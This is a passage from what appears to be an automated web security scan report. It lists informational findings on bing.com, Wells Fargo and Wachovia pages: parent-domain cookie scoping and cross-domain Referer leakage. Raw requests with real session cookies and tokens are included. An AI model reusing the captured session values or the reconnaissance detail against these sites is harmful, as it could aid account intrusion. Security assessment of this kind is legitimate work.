Content-Type: text/css
Last-Modified: Fri, 26 Nov 2010 04:08:05 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 16909
Date: Tue, 19 Jul 2011 12:09:51 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=SM=1&D=1865529&MS=1865529&AF=NOFORM; expires=Thu, 18-Jul-2013 12:09:51 GMT; domain=.bing.com; path=/

.NewsAlertForm{position:absolute;color:#555;text-decoration:none;display:block;float:right;margin-top:100px;*margin-top:0;margin-right:0;z-index:100;top:75px;left:25px}.NewsAlertForm .AlertDropDownHea
...[SNIP]...

13.24. http://www.bing.com/news/s/news3B_c.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3B_c.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/s/news3B_c.js?v=0822204709 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Last-Modified: Sun, 22 Aug 2010 20:47:09 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 4228
Date: Tue, 19 Jul 2011 12:10:50 GMT
Connection: close
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:10:50 GMT; domain=.bing.com; path=/

var _ghlc=4;function _ghlp(a){return _ge("id_hlp_"+a)}function _ghlt(a){return _ge("id_hlt_"+a)}function _gishide(a){return a.style.display=="none"}function _gisshow(a){return!_gishide(a)}function _gs
...[SNIP]...

13.25. http://www.bing.com/news/s/news3S_c.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3S_c.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/s/news3S_c.css?v=1110024132 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865529&SM=1; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css
Last-Modified: Wed, 10 Nov 2010 02:41:32 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 16722
Date: Tue, 19 Jul 2011 12:09:57 GMT
Connection: close
Set-Cookie: SRCHD=D=1865529&MS=1865529&SM=1&AF=NOFORM; expires=Thu, 18-Jul-2013 12:09:57 GMT; domain=.bing.com; path=/

.Content UL{margin:0;padding:0;list-style-type:none}.Content LI{display:block;list-style-type:none}.QueryAlterations{margin-bottom:.38em;padding-bottom:.38em;color:#333}.Header .QueryAlterations{borde
...[SNIP]...

13.26. http://www.bing.com/news/s/news3S_c.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/s/news3S_c.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/s/news3S_c.js?v=0829160238 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/x-javascript
Last-Modified: Sun, 29 Aug 2010 16:02:38 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 4140
Date: Tue, 19 Jul 2011 12:11:10 GMT
Connection: close
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:11:10 GMT; domain=.bing.com; path=/

function _changeHeight(g,e,b,c){var d,a=e,f=function(){if(a<b&&a+c<b||a>b&&a+c>b)a+=c;else{a=b;clearInterval(d)}g.style.height=a+"px"};d=setInterval(f,20)}function _p(a){return a.parentNode}function _
...[SNIP]...

13.27. http://www.bing.com/videos/vthumb_c.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/vthumb_c.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/vthumb_c.css?v=0819000746 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.bing.com
Cookie: _SS=SID=517EAE73CC104DC19B783FE3EFAFB453; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&flt7=0&flt8=0&flt9=0&flt10=0&flt11=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1865530&SM=1&D=1865529; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110719; MUID=39AE9E99C74F6BF03BB69CADC34F6B13; _FS=mkt=en-US; SRCHUID=V=2&GUID=BED17522183A437CB7743610E65B8CD1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/css
Last-Modified: Thu, 19 Aug 2010 00:07:46 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Vary: Accept-Encoding
Content-Length: 1540
Date: Tue, 19 Jul 2011 12:11:14 GMT
Connection: close
Set-Cookie: SRCHD=AF=NOFORM&MS=1865530&SM=1&D=1865529; expires=Thu, 18-Jul-2013 12:11:14 GMT; domain=.bing.com; path=/

.vt_med,.vt_med img{display:-moz-inline-stack;display:inline-block;position:relative;width:140px}.vt_md{margin-top:5px;font-size:95%}.vt_md a{text-decoration:none}.vt_md .st_c{color:#568e1a;float:left
...[SNIP]...

13.28. https://www.wellsfargo.com/tas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /tas

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /tas HTTP/1.1
Host: www.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
Content-Length: 206
Origin: https://www.wellsfargo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; JSESSIONID=248DE7CA98FB9058FEC7E28C47105F92; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER

pageURL=https%3A//www.wellsfargo.com/&ids=WF_CON_HP_PRIMARY_BNR,WF_CON_HP_SECONDARY_A_BNR,WF_CON_HP_SECONDARY_B_BNR,WF_CON_HP_SECONDARY_C_BNR&pageID=per_home&tz=-300&r=&App_ID=WWW&RequestType=ContentR
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:41:02 GMT
Content-type: text/html
Set-cookie: TCID=0007b089-750d-8c50-be96-e99900000049;Domain=.wellsfargo.com;Expires=Thu, 18-Jul-2013 09:41:02 GMT;Path=/;Secure
Set-cookie: NSC_XfmmtGbshp4=445b32067863;Domain=.wellsfargo.com;Expires=Tue, 19-Jul-2011 13:41:02 GMT;Path=/
Content-Length: 1575

/*[{"href":"https://adfarm.mediaplex.com/ad/ck/10918-69547-3408-26","contentId":"WF_CON_HP_PRIMARY_BNR","src":"https://a248.e.akamai.net/f/248/1856/90m/www.wellsfargo.com/img/ads/tas/consumer/primary/
...[SNIP]...

14. Cross-domain Referer leakage  previous  next
There are 11 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


14.1. https://online.wellsfargo.com/das/channel/enrollDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/channel/enrollDisplay

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /das/channel/enrollDisplay?LOB=CONS&OFFERCODE=WEB HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; COOKIE_SID=DyGGTlSG1XHBTfQxYQLGYXYLN92TmHhyhQyXH5nJv3gvTfnwbhdn!1611335114; ISD_DAS_COOKIE=GOgImdr3ksrLji0ECVSJBME8iwgBVBsj4F1X9LJJ4rmio2jDIGgSZrvlkCN4zIGXLfSKMZ4MlmG49VA=; OB_SO_ORIGIN=source=alternate; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 10:03:24 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: enrollment/enrollIdentify
Set-Cookie: KCOOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Set-Cookie: BRAND_COOKIE=COB; domain=.wellsfargo.com; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13678


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...
<a href="https://www.wellsfargo.com"><img src="https://a248.e.akamai.net/7/248/3608/bb61162e7a787f/online.wellsfargo.com/das/common/images/logo_62sq.gif" id="logo" alt="Wells Fargo Home Page" /></a><img src="https://a248.e.akamai.net/7/248/3608/53845d4a1846e7/online.wellsfargo.com/das/common/images/coach.gif" id="coach" alt="" /><a href="https://www.wellsfargo.com/auxiliary_access/aa_talkatmloc"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" class="inline" alt="Talking ATM Locations" border="0" height="1" width="1"/></a><a href="#skip"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" class="inline" alt="Skip to page content" border="0" height="1" width="1" /></a>
...[SNIP]...
</div>
<img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" id="mastShim1" alt="" height="1"/></td>
...[SNIP]...
<td colspan="2"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" id="mastShim2" alt="" height="1"/></td>
...[SNIP]...
<div class="tabUnderline">
<img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/common/images/shim.gif" height="1" width="1" alt="" /></div>
...[SNIP]...
<div class="c4P webwib"> <img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" id="minWidth" alt="" />


<div id="title">
...[SNIP]...
<td id="layoutBottom1"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" class="inline" alt="" height="1" width="1" /></td>
...[SNIP]...
<noscript>
                                       <img
                                       src="https://adfarm.mediaplex.com/ad/bk/994-1668-2054-5?COL01STO=1&Unique_ID=B-20110719024057407636411"
                                       border="0" height="1" width="1" alt="">

                                   </noscript>
...[SNIP]...

14.2. https://online.wellsfargo.com/signon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /signon?LOB=CONS HTTP/1.1
Host: online.wellsfargo.com
Connection: keep-alive
Referer: https://www.wellsfargo.com/locator/atm/search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=403C6448D3FA27DB; wfacookie=B-20110719024057407636411; OB_SO_ORIGIN=source%3Dhomepage; WFHOME=PER; wcmcookiesrh=n8cLTlRYjNyY5JJqwHkVryJ5zCn2Zd0wy2JnfSBfWQRhp8dP86sl!2080519142; wcmcookiewf=MlB2TlRHtlpNMhhlQQWLnngW4x5GhPs9TMCyCTHbRHNBQ1M202g6!2080519142; TLTSID=687AC65EB1EB10B1991EF87992750532; WL_CEOPORTAL=df2DTlRD23r6D8hM4JvW12QGSpyHqGCXkLJLRcS3lNh39NGQnXWn!1641303941; wcmcookieloc=yhG8TlSN83dtt298TbbLKtvdp1WmHLyTw755NPpLJVz1pLvr1x01!2080519142; TCID=0007b089-750d-8c50-be96-e99900000049; NSC_XfmmtGbshp4=445b32067863

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Tue, 19 Jul 2011 09:46:47 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: banking/signon/SignonConsumer
Set-Cookie: OB_SO_ORIGIN= LOB=CONS; domain=.wellsfargo.com; path=/
Set-Cookie: BRAND_COOKIE=; domain=.wellsfargo.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/; secure
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Length: 13532


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...
<a href="https://www.wellsfargo.com"><img src="https://a248.e.akamai.net/7/248/3608/bb61162e7a787f/online.wellsfargo.com/das/common/images/logo_62sq.gif" id="logo" alt="Wells Fargo Home Page" /></a><img src="https://a248.e.akamai.net/7/248/3608/53845d4a1846e7/online.wellsfargo.com/das/common/images/coach.gif" id="coach" alt="" /><a href="https://www.wellsfargo.com/auxiliary_access/aa_talkatmloc"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" class="inline" alt="Talking ATM Locations" border="0" height="1" width="1"/></a><a href="#skip"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" class="inline" alt="Skip to page content" border="0" height="1" width="1" /></a>
...[SNIP]...
</div>
<img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" id="mastShim1" alt="" height="1"/></td>
...[SNIP]...
<td colspan="2"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" id="mastShim2" alt="" height="1"/></td>
...[SNIP]...
<div class="tabUnderline">
<img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/common/images/shim.gif" height="1" width="1" alt="" /></div>
...[SNIP]...
<div class="c4P webwib"> <img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" id="minWidth" alt="" />


<div id="title">
...[SNIP]...
<td id="layoutBottom1"><img src="https://a248.e.akamai.net/7/248/3608/1d8352905f2c38/online.wellsfargo.com/das/common/images/shim.gif" class="inline" alt="" height="1" width="1" /></td>
...[SNIP]...

14.3. https://onlineservices.wachovia.com/auth/AuthService  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /auth/AuthService

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /auth/AuthService?action=presentLogin&logincode=brokerageWachsec&url=https%3a//wachseconline.wachovia.com HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
Referer: https://www.wellsfargoadvisors.com/conversion/signon-decision.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; CookiesAreEnabled=yes; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069189096-New%7C1342605189096%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:54:53 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-frames-option: deny
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 16325

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">


<html>
<head>
<meta http-equiv="Pragma" content="no-store">
<meta http-equiv="Pragma: no-store">
<meta http-equiv="Cache Control"
...[SNIP]...
</title>

<script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/bidata.js"></script>
...[SNIP]...
<div id="logo_image"><img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/brk/pp_toplogo3.gif" /></div>
...[SNIP]...
<a href="#" onClick="window.history.back();return false;" onMouseOver="window.status='Back';return true" onMouseOut="window.status='';return true"><img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/brk/btn_back2.gif" width="45" height="20" alt="Go back to previous page" border="0"></a>
...[SNIP]...
</strong>
<a href="https://www.wellsfargoadvisors.com/signup/index.htm">Sign
up online</a>
...[SNIP]...
</strong>
<a
href="https://www.wellsfargoadvisors.com/financial-services/account-services/online-financial-services.htm">
Learn more</a>
...[SNIP]...
</span>
<a
href="https://www.wellsfargoadvisors.com/disclosures/security.htm">
Learn
more</a>
...[SNIP]...
<div style="text-align:center;">
       <a href=https://www.wellsfargoadvisors.com/demo/index.htm"
           onClick="newpop('https://www.wellsfargoadvisors.com/demo/index.htm','generalpopup','no','no','no','no','no','yes','yes',710,550,10,10);return false;"
           onmouseover="window.status='View Demo';return true" onMouseOut="window.status='';return true">

               <img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/brk/btn_demo3.gif" width="82" height="20" alt="Click here to View Demo" border="0">
       </a>
...[SNIP]...
<div id="disc_image"><img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/brk/DisclaimerB-W.gif" width="436" height="41" alt="" /></div>
...[SNIP]...
<!-- id="v2_disclaimer" -->

       
                               <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/component/0,,40_25,00.js"></script>
...[SNIP]...
<!-- end Site Catalyst -->

<script type="text/javascript" language="JavaScript1.2" defer="defer" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/metrics/stats.js"></script>
...[SNIP]...

14.4. https://onlineservices.wachovia.com/identity/IdentityMgr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /identity/IdentityMgr

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /identity/IdentityMgr?action=secondaryPresentLogin&nextpage=PWRESET&returnurl=http%3a//www.wachovia.com HTTP/1.1
Host: onlineservices.wachovia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=95209782B1EC10B13497C08483F0D444; originalReferrer=; s_pers=%20s_visit%3D1%7C1311070855180%3B%20s_ev33%3D%255B%255B%2527Direct%252520Load%2527%252C%25271311069055183%2527%255D%255D%7C1468921855183%3B%20s_nr%3D1311069112331-New%7C1342605112331%3B; s_sess=%20s_Online%252BBanking/BillPay%252BEnrollment%252BOverviewevent6%3Devent6%3B%20s_cc%3Dtrue%3B%20s_prod%3D%253BOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20s_var_19%3DOnline%252BBanking/BillPay%252BEnrollment%252BOverview%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20SC_LINKS%3D/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%255E%255EReset%2520your%2520password%255E%255E/Wachovia%2520Miscellaneous/Home/Forgot%2520Password%2520%257C%2520Reset%2520your%2520password%255E%255E%3B%20s_sq%3Dwachoviaglobal%252Cwachovialive%253D%252526pid%25253D/Wachovia%25252520Miscellaneous/Home/Forgot%25252520Password%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//onlineservices.wachovia.com/identity/IdentityMgr%2525253Faction%2525253DsecondaryPresentLogin%25252526nextpage%2525253DPW_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; JSESSIONID=0001Rg3HY5HUmbK3eRI48SeteTO:10tep658j; AuthSvsSessionID=VeEXlj/ayWy1Ar58/R0Qxuw/xWw=56 4N.izwPc9T9UdpNwJyhhyDgtgrr.649446; CookiesAreEnabled=yes

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 09:52:56 GMT
Server: IBM_HTTP_Server
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-frames-option: deny
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Content-Length: 18355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
</title>


   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/index.css" rel="stylesheet" type="text/css" media="screen" />

   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/index-p.css" rel="stylesheet" type="text/css" media="print" />
   <style type="text/css">
...[SNIP]...
</style>
   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/handheld.css" rel="stylesheet" type="text/css" media="handheld" />


   <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/js/bidata.js"></script>
...[SNIP]...
<div id="header">
       <img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/logo_cobrand.gif" alt="Wachovia A Wells Fargo Company" id="logo" />
       <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script>
       <img src="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/images/default_logotype.gif" alt="" id="subbrand" />
   </div>
...[SNIP]...
